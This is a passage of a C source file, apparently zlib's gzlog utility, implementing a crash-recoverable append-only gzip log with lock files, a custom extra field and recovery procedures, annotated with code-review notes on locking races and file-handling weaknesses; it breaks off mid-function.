of data including the contents of the foo.add file. 
Again, the foo.add file is maintained during the compress operation in case of an interruption. If in the unlikely event the foo.add file with the data to be compressed is missing due to some external force, a gzip file with just the previous compressed data will be reconstructed. In this case, all of the data that was to be compressed is lost (approximately one megabyte). This will not occur if all that happened was an interruption of the compress operation. The third state that is marked is the replacement of the old dictionary with the new dictionary after a compress operation. Once compression is complete, the gzip file is marked as being in the replace state. This completes the gzip file, so an interrupt after being so marked does not result in recompression. Then the dictionary file is replaced, and the gzip file is marked as completed. This state prevents the possibility of restarting compression with the wrong dictionary file. All three operations are wrapped by a lock/unlock procedure. In order to gain exclusive access to the log files, first a foo.lock file must be exclusively created. When all operations are complete, the lock is released by deleting the foo.lock file. If when attempting to create the lock file, it already exists and the modify time of the lock file is more than five minutes old (set by the PATIENCE define below), then the old lock file is considered stale and deleted, and the exclusive creation of the lock file is retried. To assure that there are no false assessments of the staleness of the lock file, the operations periodically touch the lock file to update the modified date. Following is the definition of the extra field with all of the information required to enable the above append and compress operations and their recovery if interrupted. Multi-byte values are stored little endian (consistent with the gzip format). File pointers are eight bytes long. The crc's and lengths for the gzip trailer are four bytes long. 
(Note that the length at the end of a gzip file is used for error checking only, and for large files is actually the length modulo 2^32.) The stored block length is two bytes long. The gzip extra field two-byte identification is "ap" for append. It is assumed that writing the extra field to the file is an "atomic" operation. That is, either all of the extra field is written to the file, or none of it is, if the operation is interrupted right at the point of updating the extra field. This is a reasonable assumption, since the extra field is within the first 52 bytes of the file, which is smaller than any expected block size for a mass storage device (usually 512 bytes or larger). Extra field (35 bytes): - Pointer to first stored block length -- this points to the two-byte length of the first stored block, which is followed by the two-byte, one's complement of that length. The stored block length is preceded by the three-bit header of the stored block, which is the actual start of the stored block in the deflate format. See the bit offset field below. - Pointer to the last stored block length. This is the same as above, but for the last stored block of the uncompressed data in the gzip file. Initially this is the same as the first stored block length pointer. When the stored block gets to 16K (see the MAX_STORE define), then a new stored block is added, at which point the last stored block length pointer is different from the first stored block length pointer. When they are different, the first bit of the last stored block header is eight bits, or one byte back from the block length. - Compressed data crc and length. This is the crc and length of the data that is in the compressed portion of the deflate stream. These are used only in the event that the foo.add file containing the data to compress is lost after a compress operation is interrupted. - Total data crc and length. 
This is the crc and length of all of the data stored in the gzip file, compressed and uncompressed. It is used to reconstruct the gzip trailer when compressing, as well as when recovering interrupted operations. - Final stored block length. This is used to quickly find where to append, and allows the restoration of the original final stored block state when an append operation is interrupted. - First stored block start as the number of bits back from the final stored block first length byte. This value is in the range of 3..10, and is stored as the low three bits of the final byte of the extra field after subtracting three (0..7). This allows the last-block bit of the stored block header to be updated when a new stored block is added, for the case when the first stored block and the last stored block are the same. (When they are different, the number of bits back is known to be eight.) This also allows for new compressed data to be appended to the old compressed data in the compress operation, overwriting the previous first stored block, or for the compressed data to be terminated and a valid gzip file reconstructed on the off chance that a compression operation was interrupted and the data to compress in the foo.add file was deleted. - The operation in process. This is the next two bits in the last byte (the bits under the mask 0x18). They are interpreted as 0: nothing in process, 1: append in process, 2: compress in process, 3: replace in process. - The top three bits of the last byte in the extra field are reserved and are currently set to zero. Main procedure: - Exclusively create the foo.lock file using the O_CREAT and O_EXCL modes of the system open() call. If the modify time of an existing lock file is more than PATIENCE seconds old, then the lock file is deleted and the exclusive create is retried. - Load the extra field from the foo.gz file, and see if an operation was in progress but not completed. If so, apply the recovery procedure below. 
- Perform the append procedure with the provided data. - If the uncompressed data in the foo.gz file is 1MB or more, apply the compress procedure. - Delete the foo.lock file. Append procedure: - Put what to append in the foo.add file so that the operation can be restarted if this procedure is interrupted. - Mark the foo.gz extra field with the append operation in progress. + Restore the original last-block bit and stored block length of the last stored block from the information in the extra field, in case a previous append operation was interrupted. - Append the provided data to the last stored block, creating new stored blocks as needed and updating the stored blocks last-block bits and lengths. - Update the crc and length with the new data, and write the gzip trailer. - Write over the extra field (with a single write operation) with the new pointers, lengths, and crc's, and mark the gzip file as not in process. Though there is still a foo.add file, it will be ignored since nothing is in process. If a foo.add file is leftover from a previously completed operation, it is truncated when writing new data to it. - Delete the foo.add file. Compress and replace procedures: - Read all of the uncompressed data in the stored blocks in foo.gz and write it to foo.add. Also write foo.temp with the last 32K of that data to provide a dictionary for the next invocation of this procedure. - Rewrite the extra field marking foo.gz with a compression in process. * If there is no data provided to compress (due to a missing foo.add file when recovering), reconstruct and truncate the foo.gz file to contain only the previous compressed data and proceed to the step after the next one. Otherwise ... - Compress the data with the dictionary in foo.dict, and write to the foo.gz file starting at the bit immediately following the last previously compressed block. If there is no foo.dict, proceed anyway with the compression at slightly reduced efficiency. 
(For the foo.dict file to be missing requires some external failure beyond simply the interruption of a compress operation.) During this process, the foo.lock file is periodically touched to assure that that file is not considered stale by another process before we're done. The deflation is terminated with a non-last empty static block (10 bits long), that is then located and written over by a last-bit-set empty stored block. - Append the crc and length of the data in the gzip file (previously calculated during the append operations). - Write over the extra field with the updated stored block offsets, bits back, crc's, and lengths, and mark foo.gz as in process for a replacement of the dictionary. @ Delete the foo.add file. - Replace foo.dict with foo.temp. - Write over the extra field, marking foo.gz as complete. Recovery procedure: - If not a replace recovery, read in the foo.add file, and provide that data to the appropriate recovery below. If there is no foo.add file, provide a zero data length to the recovery. In that case, the append recovery restores the foo.gz to the previous compressed + uncompressed data state. For the compress recovery, a missing foo.add file results in foo.gz being restored to the previous compressed-only data state. 
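   - Append recovery:
     - Pick up append at + step above
   - Compress recovery:
     - Pick up compress at * step above
   - Replace recovery:
     - Pick up compress at @ step above
   - Log the repair with a date stamp in foo.repairs
 */

/* The header names below were lost from this copy of the file; they are
   restored from the functions each line's comment lists.  The first include
   carries no comment and is taken to be <sys/types.h>, which provides the
   off_t used in struct log. */
#include <sys/types.h>
#include <stdio.h>      /* rename, fopen, fprintf, fclose */
#include <stdlib.h>     /* malloc, free */
#include <string.h>     /* strlen, strrchr, strcpy, strncpy, strcmp */
#include <fcntl.h>      /* open */
#include <unistd.h>     /* lseek, read, write, close, unlink, sleep, */
                        /* ftruncate, fsync */
#include <errno.h>      /* errno */
#include <time.h>       /* time, ctime */
#include <sys/stat.h>   /* stat */
#include <sys/time.h>   /* utimes */
#include "zlib.h"       /* crc32 */

#include "gzlog.h"      /* header for external access */

#define local static
typedef unsigned int uint;
typedef unsigned long ulong;

/* Macro for debugging to deterministically force recovery operations */
#ifdef GZLOG_DEBUG
    #include <setjmp.h>         /* longjmp */
    jmp_buf gzlog_jump;         /* where to go back to */
    int gzlog_bail = 0;         /* which point to bail at (1..8) */
    int gzlog_count = -1;       /* number of times through to wait */
#   define BAIL(n) do { if ((n) == gzlog_bail && gzlog_count-- == 0) \
                            longjmp(gzlog_jump, gzlog_bail); } while (0)
#else
#   define BAIL(n)
#endif

/* how old the lock file can be in seconds before considering it stale */
#define PATIENCE 300

/* maximum stored block size in Kbytes -- must be in 1..63 */
#define MAX_STORE 16

/* number of stored Kbytes to trigger compression (must be >= 32 to allow
   dictionary construction, and <= 204 * MAX_STORE, in order for >> 10 to
   discard the stored block headers contribution of five bytes each) */
#define TRIGGER 1024

/* size of a deflate dictionary (this cannot be changed) */
#define DICT 32768U

/* values for the operation (2 bits) */
#define NO_OP 0
#define APPEND_OP 1
#define COMPRESS_OP 2
#define REPLACE_OP 3

/* macros to extract little-endian integers from an unsigned byte buffer --
   the pointer argument is parenthesized wherever it is offset, so that an
   expression argument keeps its meaning */
#define PULL2(p) ((p)[0]+((uint)((p)[1])<<8))
#define PULL4(p) (PULL2(p)+((ulong)PULL2((p)+2)<<16))
#define PULL8(p) (PULL4(p)+((off_t)PULL4((p)+4)<<32))

/* macros to store integers into a byte buffer in little-endian order -- both
   arguments are parenthesized so that an expression such as x ^ 0xffff is
   shifted as a whole; each argument is evaluated more than once, so it must
   not have side effects */
#define PUT2(p,a) do {(p)[0]=(a);(p)[1]=(a)>>8;} while(0)
#define PUT4(p,a) do {PUT2(p,a);PUT2((p)+2,(a)>>16);} while(0)
#define PUT8(p,a) do {PUT4(p,a);PUT4((p)+4,(a)>>32);} while(0)

/* internal structure for log information */
#define LOGID "\106\035\172"    /* should be three non-zero characters */
struct log {
    char id[4];     /* contains LOGID to detect inadvertent overwrites */
    int fd;         /* file descriptor for .gz file, opened read/write */
    char *path;     /* allocated path, e.g. "/var/log/foo" or "foo" */
    char *end;      /* end of path, for appending suffixes such as ".gz" */
    off_t first;    /* offset of first stored block first length byte */
    int back;       /* location of first block id in bits back from first */
    uint stored;    /* bytes currently in last stored block */
    off_t last;     /* offset of last stored block first length byte */
    ulong ccrc;     /* crc of compressed data */
    ulong clen;     /* length (modulo 2^32) of compressed data */
    ulong tcrc;     /* crc of total data */
    ulong tlen;     /* length (modulo 2^32) of total data */
    time_t lock;    /* last modify time of our lock file */
};

/* gzip header for gzlog */
local unsigned char log_gzhead[] = {
    0x1f, 0x8b,                 /* magic gzip id */
    8,                          /* compression method is deflate */
    4,                          /* there is an extra field (no file name) */
    0, 0, 0, 0,                 /* no modification time provided */
    0, 0xff,                    /* no extra flags, no OS specified */
    39, 0, 'a', 'p', 35, 0      /* extra field with "ap" subfield */
                                /* 35 is EXTRA, 39 is EXTRA + 4 */
};

#define HEAD sizeof(log_gzhead)     /* should be 16 */

/* initial gzip extra field content (52 == HEAD + EXTRA + 1) */
local unsigned char log_gzext[] = {
    52, 0, 0, 0, 0, 0, 0, 0,    /* offset of first stored block length */
    52, 0, 0, 0, 0, 0, 0, 0,    /* offset of last stored block length */
    0, 0, 0, 0, 0, 0, 0, 0,     /* compressed data crc and length */
    0, 0, 0, 0, 0, 0, 0, 0,     /* total data crc and length */
    0, 0,                       /* final stored block data length */
    5                           /* op is NO_OP, last bit 8 bits back */
};

#define EXTRA sizeof(log_gzext)     /* 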
should be 35 */

/* initial gzip data and trailer */
local unsigned char log_gzbody[] = {
    1, 0, 0, 0xff, 0xff,        /* empty stored block (last) */
    0, 0, 0, 0,                 /* crc */
    0, 0, 0, 0                  /* uncompressed length */
};

#define BODY sizeof(log_gzbody)

/* Exclusively create foo.lock in order to negotiate exclusive access to the
   foo.* files.  If the modify time of an existing lock file is greater than
   PATIENCE seconds in the past, then consider the lock file to have been
   abandoned, delete it, and try the exclusive create again.  Save the lock
   file modify time for verification of ownership.  Return 0 on success, or -1
   on failure, usually due to an access restriction or invalid path.  Note that
   if stat() or unlink() fails, it may be due to another process noticing the
   abandoned lock file a smidge sooner and deleting it, so those are not
   flagged as an error.

   NOTE(review): the staleness test and the unlink() are separate calls on the
   path, not on one open file.  It appears that a waiter which has already
   judged the old lock stale can unlink a lock that another waiter created in
   the meantime, leaving both believing they hold it.  The modify time saved in
   log->lock is what log_check() later uses to notice this, and st_mtime has
   one-second resolution, so two locks created within the same second would
   not be told apart -- confirm whether callers rely on log_check() for this.

   NOTE(review): if the final stat() fails, log->lock keeps its previous value
   and 0 is still returned. */
local int log_lock(struct log *log)
{
    int fd;
    struct stat st;

    /* write the suffix at the end of the path; this assumes the buffer behind
       log->path has room for it -- the allocation is not in this part of the
       file, TODO confirm */
    strcpy(log->end, ".lock");
    /* O_CREAT | O_EXCL makes the create fail with EEXIST if the file exists */
    while ((fd = open(log->path, O_CREAT | O_EXCL, 0644)) < 0) {
        if (errno != EEXIST)
            return -1;
        if (stat(log->path, &st) == 0 && time(NULL) - st.st_mtime > PATIENCE) {
            unlink(log->path);
            continue;
        }
        sleep(2);       /* relinquish the CPU for two seconds while waiting */
    }
    /* only the existence of the file matters, so the descriptor is closed */
    close(fd);
    if (stat(log->path, &st) == 0)
        log->lock = st.st_mtime;
    return 0;
}

/* Update the modify time of the lock file to now, in order to prevent another
   task from thinking that the lock is stale.  Save the lock file modify time
   for verification of ownership.  The return value of utimes() is not
   checked; if the following stat() fails, log->lock is left unchanged. */
local void log_touch(struct log *log)
{
    struct stat st;

    strcpy(log->end, ".lock");
    utimes(log->path, NULL);    /* NULL times: set to the current time */
    if (stat(log->path, &st) == 0)
        log->lock = st.st_mtime;
}

/* Check the log file modify time against what is expected.  Return true if
   this is not our lock.  If it is our lock, touch it to keep it.  "Not ours"
   means that stat() on the lock file failed or that its modify time differs
   from the value saved in log->lock. */
local int log_check(struct log *log)
{
    struct stat st;

    strcpy(log->end, ".lock");
    if (stat(log->path, &st) || st.st_mtime != log->lock)
        return 1;
    log_touch(log);
    return 0;
}

/* Unlock a previously acquired lock, but only if it's ours.  Ownership is
   decided by log_check(); the unlink() that follows is a separate call on the
   path. */
local void log_unlock(struct log *log)
{
    if (log_check(log))
        return;
    strcpy(log->end, ".lock");
    unlink(log->path);
    log->lock = 0;
}

/* Check the gzip header and read in the extra field, filling in the values in
   the log structure.  Return op on success or -1 if the gzip header was not as
   expected.  op is the current operation in progress last written to the extra
   field.  This assumes that the gzip file has already been opened, with the
   file descriptor log->fd.

   The first HEAD bytes must match log_gzhead exactly; the EXTRA bytes after
   them are decoded as little-endian fields without any range or consistency
   check, and the three reserved top bits of the last byte are ignored.

   NOTE(review): the decoded values are used as file positions and sizes later
   in this file -- log_last() seeks to log->last minus one or two bytes, and
   log_append() computes (MAX_STORE << 10) - log->stored in unsigned
   arithmetic, which would wrap for a stored value above that limit.  If
   foo.gz can be modified by anything other than this code, checking here that
   first <= last and stored <= (MAX_STORE << 10) would be worth considering --
   verify against the states the recovery paths can leave behind. */
local int log_head(struct log *log)
{
    int op;
    unsigned char buf[HEAD + EXTRA];

    /* a short read, a seek failure, and a header mismatch are all reported
       the same way */
    if (lseek(log->fd, 0, SEEK_SET) < 0 ||
        read(log->fd, buf, HEAD + EXTRA) != HEAD + EXTRA ||
        memcmp(buf, log_gzhead, HEAD)) {
        return -1;
    }
    log->first = PULL8(buf + HEAD);
    log->last = PULL8(buf + HEAD + 8);
    log->ccrc = PULL4(buf + HEAD + 16);
    log->clen = PULL4(buf + HEAD + 20);
    log->tcrc = PULL4(buf + HEAD + 24);
    log->tlen = PULL4(buf + HEAD + 28);
    log->stored = PULL2(buf + HEAD + 32);
    /* last byte: low three bits are bits-back minus three, the next two bits
       are the operation in process */
    log->back = 3 + (buf[HEAD + 34] & 7);
    op = (buf[HEAD + 34] >> 3) & 3;
    return op;
}

/* Write over the extra field contents, marking the operation as op.  Use fsync
   to assure that the device is written to, and in the requested order.  This
   operation, and only this operation, is assumed to be atomic in order to
   assure that the log is recoverable in the event of an interruption at any
   point in the process.  Return -1 if the write to foo.gz failed.
*/
local int log_mark(struct log *log, int op)
{
    int ret;
    unsigned char ext[EXTRA];

    /* serialize the in-memory state at the same offsets that log_head()
       reads it back from */
    PUT8(ext, log->first);
    PUT8(ext + 8, log->last);
    PUT4(ext + 16, log->ccrc);
    PUT4(ext + 20, log->clen);
    PUT4(ext + 24, log->tcrc);
    PUT4(ext + 28, log->tlen);
    PUT2(ext + 32, log->stored);
    /* low three bits hold back - 3, the bits above them hold op */
    ext[34] = log->back - 3 + (op << 3);
    /* flush earlier writes, write the mark, then flush the mark -- note that
       the fsync() results are not checked, so a failed flush is not reported
       to the caller */
    fsync(log->fd);
    /* parses as (seek failed || short write) ? -1 : 0 */
    ret = lseek(log->fd, HEAD, SEEK_SET) < 0 ||
          write(log->fd, ext, EXTRA) != EXTRA ? -1 : 0;
    fsync(log->fd);
    return ret;
}

/* Rewrite the last block header bits and subsequent zero bits to get to a byte
   boundary, setting the last block bit if last is true, and then write the
   remainder of the stored block header (length and one's complement). Leave
   the file pointer after the end of the last stored block data. Return -1 if
   there is a read or write failure on the foo.gz file */
local int log_last(struct log *log, int last)
{
    int back, len, mask;
    unsigned char buf[6];

    /* determine the locations of the bytes and bits to modify */
    back = log->last == log->first ? log->back : 8;
    len = back > 8 ? 2 : 1;                 /* bytes back from log->last */
    mask = 0x80 >> ((back - 1) & 7);        /* mask for block last-bit */

    /* get the byte to modify (one or two back) into buf[0] -- don't need to
       read the byte if the last-bit is eight bits back, since in that case
       the entire byte will be modified */
    buf[0] = 0;
    if (back != 8 && (lseek(log->fd, log->last - len, SEEK_SET) < 0 ||
                      read(log->fd, buf, 1) != 1))
        return -1;

    /* change the last-bit of the last stored block as requested -- note
       that all bits above the last-bit are set to zero, per the type bits
       of a stored block being 00 and per the convention that the bits to
       bring the stream to a byte boundary are also zeros */
    buf[1] = 0;
    buf[2 - len] = (*buf & (mask - 1)) + (last ? mask : 0);

    /* write the modified stored block header and lengths, move the file
       pointer to after the last stored block data */
    PUT2(buf + 2, log->stored);
    PUT2(buf + 4, log->stored ^ 0xffff);
    /* parses as (seek || short write || seek) ? -1 : 0 */
    return lseek(log->fd, log->last - len, SEEK_SET) < 0 ||
           write(log->fd, buf + 2 - len, len + 4) != len + 4 ||
           lseek(log->fd, log->stored, SEEK_CUR) < 0 ? -1 : 0;
}

/* Append len bytes from data to the locked and open log file. len may be zero
   if recovering and no .add file was found. In that case, the previous state
   of the foo.gz file is restored. The data is appended uncompressed in
   deflate stored blocks. Return -1 if there was an error reading or writing
   the foo.gz file. BAIL() is defined outside this part of the file; it
   presumably marks the points at which an interruption can be simulated --
   TODO confirm. */
local int log_append(struct log *log, unsigned char *data, size_t len)
{
    uint put;
    off_t end;
    unsigned char buf[8];

    /* set the last block last-bit and length, in case recovering an
       interrupted append, then position the file pointer to append to the
       block */
    if (log_last(log, 1))
        return -1;

    /* append, adding stored blocks and updating the offset of the last stored
       block as needed, and update the total crc and length */
    while (len) {
        /* append as much as we can to the last block */
        put = (MAX_STORE << 10) - log->stored;
        if (put > len)
            put = (uint)len;
        if (put) {
            if (write(log->fd, data, put) != put)
                return -1;
            BAIL(1);
            log->tcrc = crc32(log->tcrc, data, put);
            log->tlen += put;
            log->stored += put;
            data += put;
            len -= put;
        }

        /* if we need to, add a new empty stored block */
        if (len) {
            /* mark current block as not last */
            if (log_last(log, 0))
                return -1;

            /* point to new, empty stored block */
            log->last += 4 + log->stored + 1;
            log->stored = 0;
        }

        /* mark last block as last, update its length */
        if (log_last(log, 1))
            return -1;
        BAIL(2);
    }

    /* write the new crc and length trailer, and truncate just in case (could
       be recovering from partial append with a missing foo.add file) */
    PUT4(buf, log->tcrc);
    PUT4(buf + 4, log->tlen);
    if (write(log->fd, buf, 8) != 8 ||
        (end = lseek(log->fd, 0, SEEK_CUR)) < 0 || ftruncate(log->fd, end))
        return -1;

    /* write the extra field, marking the log file as done, delete .add file */
    if (log_mark(log, NO_OP))
        return -1;
    strcpy(log->end, ".add");
    unlink(log->path);          /* ignore error, since may not exist */
    return 0;
}

/* Replace the foo.dict file with the foo.temp file. Also delete the foo.add
   file, since the compress operation may have been interrupted before that
   was done. Returns -2 if memory could not be allocated, or -1 if reading or
   writing foo.gz fails, or if the rename fails for some reason other than
   foo.temp not existing. foo.temp not existing is a permitted error, since
   the replace operation may have been interrupted after the rename is done,
   but before foo.gz is marked as complete. */
local int log_replace(struct log *log)
{
    int ret;
    char *dest;

    /* delete foo.add file */
    strcpy(log->end, ".add");
    unlink(log->path);          /* ignore error, since may not exist */
    BAIL(3);

    /* rename foo.temp to foo.dict, replacing foo.dict if it exists -- the
       destination name needs its own copy because log->path is rewritten in
       place to form the source name */
    strcpy(log->end, ".dict");
    dest = malloc(strlen(log->path) + 1);
    if (dest == NULL)
        return -2;
    strcpy(dest, log->path);
    strcpy(log->end, ".temp");
    ret = rename(log->path, dest);
    free(dest);
    if (ret && errno != ENOENT)
        return -1;
    BAIL(4);

    /* mark the foo.gz file as done */
    return log_mark(log, NO_OP);
}

/* Compress the len bytes at data and append the compressed data to the
   foo.gz deflate data immediately after the previous compressed data. This
   overwrites the previous uncompressed data, which was stored in foo.add
   and is the data provided in data[0..len-1]. If this operation is
   interrupted, it picks up at the start of this routine, with the foo.add
   file read in again. If there is no data to compress (len == 0), then we
   simply terminate the foo.gz file after the previously compressed data,
   appending a final empty stored block and the gzip trailer. Return -1 if
   reading or writing the foo.gz file failed, or -2 if there was a memory
   allocation failure.
*/
local int log_compress(struct log *log, unsigned char *data, size_t len)
{
    int fd;
    uint got, max;
    ssize_t dict;
    off_t end;
    z_stream strm;
    unsigned char buf[DICT];

    /* compress and append compressed data */
    if (len) {
        /* set up for deflate, allocating memory -- negative windowBits asks
           zlib for raw deflate with no zlib or gzip wrapper */
        strm.zalloc = Z_NULL;
        strm.zfree = Z_NULL;
        strm.opaque = Z_NULL;
        if (deflateInit2(&strm, Z_DEFAULT_COMPRESSION, Z_DEFLATED, -15, 8,
                         Z_DEFAULT_STRATEGY) != Z_OK)
            return -2;

        /* read in dictionary (last 32K of data that was compressed) -- a
           missing foo.dict is not an error, compression then simply starts
           without a dictionary */
        strcpy(log->end, ".dict");
        fd = open(log->path, O_RDONLY, 0);
        if (fd >= 0) {
            dict = read(fd, buf, DICT);
            close(fd);
            if (dict < 0) {
                deflateEnd(&strm);
                return -1;
            }
            if (dict)
                deflateSetDictionary(&strm, buf, (uint)dict);
        }
        log_touch(log);

        /* prime deflate with last bits of previous block, position write
           pointer to write those bits and overwrite what follows */
        if (lseek(log->fd, log->first - (log->back > 8 ? 2 : 1),
                SEEK_SET) < 0 ||
            read(log->fd, buf, 1) != 1 || lseek(log->fd, -1, SEEK_CUR) < 0) {
            deflateEnd(&strm);
            return -1;
        }
        deflatePrime(&strm, (8 - log->back) & 7, *buf);

        /* compress, finishing with a partial non-last empty static block --
           the return values of deflate(), deflateSetDictionary() and
           deflatePrime() are not checked here */
        strm.next_in = data;
        max = (((uint)0 - 1) >> 1) + 1; /* in case int smaller than size_t */
        do {
            strm.avail_in = len > max ? max : (uint)len;
            len -= strm.avail_in;
            do {
                strm.avail_out = DICT;
                strm.next_out = buf;
                deflate(&strm, len ? Z_NO_FLUSH : Z_PARTIAL_FLUSH);
                got = DICT - strm.avail_out;
                if (got && write(log->fd, buf, got) != got) {
                    deflateEnd(&strm);
                    return -1;
                }
                log_touch(log);
            } while (strm.avail_out == 0);
        } while (len);
        deflateEnd(&strm);
        BAIL(5);

        /* find start of empty static block -- scanning backwards the first one
           bit is the second bit of the block, if the last byte is zero, then
           we know the byte before that has a one in the top bit, since an
           empty static block is ten bits long */
        if ((log->first = lseek(log->fd, -1, SEEK_CUR)) < 0 ||
            read(log->fd, buf, 1) != 1)
            return -1;
        log->first++;
        if (*buf) {
            log->back = 1;
            while ((*buf & ((uint)1 << (8 - log->back++))) == 0)
                ;       /* guaranteed to terminate, since *buf != 0 */
        }
        else
            log->back = 10;

        /* update compressed crc and length */
        log->ccrc = log->tcrc;
        log->clen = log->tlen;
    }
    else {
        /* no data to compress -- fix up existing gzip stream */
        log->tcrc = log->ccrc;
        log->tlen = log->clen;
    }

    /* complete and truncate gzip stream */
    log->last = log->first;
    log->stored = 0;
    PUT4(buf, log->tcrc);
    PUT4(buf + 4, log->tlen);
    if (log_last(log, 1) || write(log->fd, buf, 8) != 8 ||
        (end = lseek(log->fd, 0, SEEK_CUR)) < 0 || ftruncate(log->fd, end))
        return -1;
    BAIL(6);

    /* mark as being in the replace operation */
    if (log_mark(log, REPLACE_OP))
        return -1;

    /* execute the replace operation and mark the file as done */
    return log_replace(log);
}

/* Log a repair record to the .repairs file: one line holding the current
   time, the name of the operation being recovered, and record. If the file
   cannot be opened for appending, the record is silently dropped. Note that
   this leaves log->end set to ".repairs". */
local void log_log(struct log *log, int op, char *record)
{
    time_t now;
    FILE *rec;

    now = time(NULL);
    strcpy(log->end, ".repairs");
    rec = fopen(log->path, "a");
    if (rec == NULL)
        return;
    /* %.24s keeps the ctime() text up to, but not including, its newline */
    fprintf(rec, "%.24s %s recovery: %s\n", ctime(&now), op == APPEND_OP ?
            "append" : (op == COMPRESS_OP ? "compress" : "replace"), record);
    fclose(rec);
    return;
}

/* Recover the interrupted operation op. First read foo.add for recovering an
   append or compress operation.
Return -1 if there was an error reading or writing foo.gz or reading an
   existing foo.add, or -2 if there was a memory allocation failure. Each step
   is recorded in foo.repairs through log_log(). The size of foo.add is taken
   from stat() before the file is opened, and the file is read with a single
   read(); if fewer bytes than that come back the recovery is reported as a
   read failure. */
local int log_recover(struct log *log, int op)
{
    int fd, ret = 0;
    unsigned char *data = NULL;
    size_t len = 0;
    struct stat st;

    /* note the start of the recovery */
    log_log(log, op, "start");

    /* only append and compress recoveries replay foo.add */
    if (op == APPEND_OP || op == COMPRESS_OP) {
        strcpy(log->end, ".add");
        if (stat(log->path, &st) != 0 || st.st_size == 0)
            log_log(log, op, "missing .add file!");
        else {
            /* the size has to survive the conversion to size_t */
            len = (size_t)(st.st_size);
            if ((off_t)len != st.st_size) {
                log_log(log, op, "allocation failure");
                return -2;
            }
            data = malloc(st.st_size);
            if (data == NULL) {
                log_log(log, op, "allocation failure");
                return -2;
            }

            /* log->end still reads ".add" here, since log_log() has not been
               called since it was set */
            fd = open(log->path, O_RDONLY, 0);
            if (fd < 0) {
                free(data);
                log_log(log, op, ".add file read failure");
                return -1;
            }
            ret = (size_t)read(fd, data, len) != len;
            close(fd);
            if (ret) {
                free(data);
                log_log(log, op, ".add file read failure");
                return -1;
            }
            log_log(log, op, "loaded .add file");
        }
    }

    /* redo the operation that was interrupted; any other op leaves ret 0 */
    if (op == APPEND_OP)
        ret = log_append(log, data, len);
    else if (op == COMPRESS_OP)
        ret = log_compress(log, data, len);
    else if (op == REPLACE_OP)
        ret = log_replace(log);

    /* note the outcome */
    log_log(log, op, ret ? "failure" : "complete");

    /* free(NULL) is a no-op, so no test is needed when nothing was loaded */
    free(data);
    return ret;
}

/* Close the foo.gz descriptor if one is open, mark it closed, and give up the
   lock through log_unlock(). */
local void log_close(struct log *log)
{
    int fd = log->fd;

    log->fd = -1;
    if (fd >= 0)
        close(fd);
    log_unlock(log);
}

/* Open foo.gz, verify the header, and load the extra field contents, after
   first creating the foo.lock file to gain exclusive access to the foo.*
   files. If foo.gz does not exist or is empty, then write the initial header,
   extra, and body content of an empty foo.gz log file. If there is an error
   creating the lock file due to access restrictions, or an error reading or
   writing the foo.gz file, or if the foo.gz file is not a proper log file for
   this object (e.g.
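not a gzip file or does not contain the expected extra field), then return
   true. If there is an error, the lock is released. Otherwise, the lock is
   left in place.

   NOTE(review): foo.gz is opened by name with O_CREAT and mode 0644, which
   follows an existing symbolic link at that name and leaves a newly created
   log readable by other accounts (subject to the umask). */
local int log_open(struct log *log)
{
    int op;

    /* release open file resource if left over -- can occur if lock lost
       between gzlog_open() and gzlog_write() */
    if (log->fd >= 0)
        close(log->fd);
    log->fd = -1;

    /* negotiate exclusive access */
    if (log_lock(log) < 0)
        return -1;

    /* open the log file, foo.gz */
    strcpy(log->end, ".gz");
    log->fd = open(log->path, O_RDWR | O_CREAT, 0644);
    if (log->fd < 0) {
        log_close(log);
        return -1;
    }

    /* if new, initialize foo.gz with an empty log, delete old dictionary */
    if (lseek(log->fd, 0, SEEK_END) == 0) {
        if (write(log->fd, log_gzhead, HEAD) != HEAD ||
            write(log->fd, log_gzext, EXTRA) != EXTRA ||
            write(log->fd, log_gzbody, BODY) != BODY) {
            log_close(log);
            return -1;
        }
        strcpy(log->end, ".dict");
        unlink(log->path);
    }

    /* verify log file and load extra field information */
    if ((op = log_head(log)) < 0) {
        log_close(log);
        return -1;
    }

    /* check for interrupted process and if so, recover */
    if (op != NO_OP && log_recover(log, op)) {
        log_close(log);
        return -1;
    }

    /* touch the lock file to prevent another process from grabbing it */
    log_touch(log);
    return 0;
}

/* See gzlog.h for the description of the external methods below */

/* Allocate a log structure for the file name prefix path, take the lock and
   open (or create and initialize) path.gz, recovering an interrupted
   operation if the extra field records one. Return the structure, or NULL if
   path is NULL or empty, memory cannot be allocated, or log_open() fails. */
gzlog *gzlog_open(char *path)
{
    size_t n;
    struct log *log;

    /* check arguments */
    if (path == NULL || *path == 0)
        return NULL;

    /* allocate and initialize log structure */
    log = malloc(sizeof(struct log));
    if (log == NULL)
        return NULL;
    strcpy(log->id, LOGID);
    log->fd = -1;
    log->lock = 0;      /* no lock held yet -- never leave this indeterminate
                           for log_check() to compare against */

    /* save path and end of path for name construction */
    n = strlen(path);
    log->path = malloc(n + 9);              /* allow for ".repairs" */
    if (log->path == NULL) {
        free(log);
        return NULL;
    }
    strcpy(log->path, path);
    log->end = log->path + n;

    /* gain exclusive access and verify log file -- may perform a
       recovery operation if needed */
    if (log_open(log)) {
        free(log->path);
        free(log);
        return NULL;
    }

    /* return pointer to log structure */
    return log;
}

/* gzlog_compress() return values:
    0: all good
   -1: file i/o error (usually access issue)
   -2: memory allocation failure
   -3: invalid log pointer argument

   The stored blocks are read back into memory, saved to foo.add (so that an
   interrupted compress can be redone), the tail of the data is saved to
   foo.temp as the next dictionary, and only then is foo.gz marked and
   rewritten by log_compress().

   NOTE(review): foo.add and foo.temp are opened by name with O_CREAT |
   O_TRUNC and mode 0644, which follows an existing symbolic link at either
   name, so the directory holding the log should be writable only by the
   logging account. */
int gzlog_compress(gzlog *logd)
{
    int fd, ret;
    uint block;
    size_t len, next;
    unsigned char *data, buf[5];
    struct log *log = logd;

    /* check arguments */
    if (log == NULL || strcmp(log->id, LOGID))
        return -3;

    /* see if we lost the lock -- if so get it again and reload the extra
       field information (it probably changed), recover last operation if
       necessary */
    if (log_check(log) && log_open(log))
        return -1;

    /* create space for uncompressed data -- len is zero when nothing has been
       appended since the last compress, and malloc(0) is permitted to return
       NULL, so ask for at least one byte rather than report that case as an
       allocation failure */
    len = ((size_t)(log->last - log->first) & ~(((size_t)1 << 10) - 1)) +
          log->stored;
    if ((data = malloc(len ? len : 1)) == NULL)
        return -2;

    /* do statement here is just a cheap trick for error handling */
    do {
        /* read in the uncompressed data -- each stored block length comes
           from the file, so it is checked against the space left in data
           before the block is read */
        if (lseek(log->fd, log->first - 1, SEEK_SET) < 0)
            break;
        next = 0;
        while (next < len) {
            if (read(log->fd, buf, 5) != 5)
                break;
            block = PULL2(buf + 1);
            if (next + block > len ||
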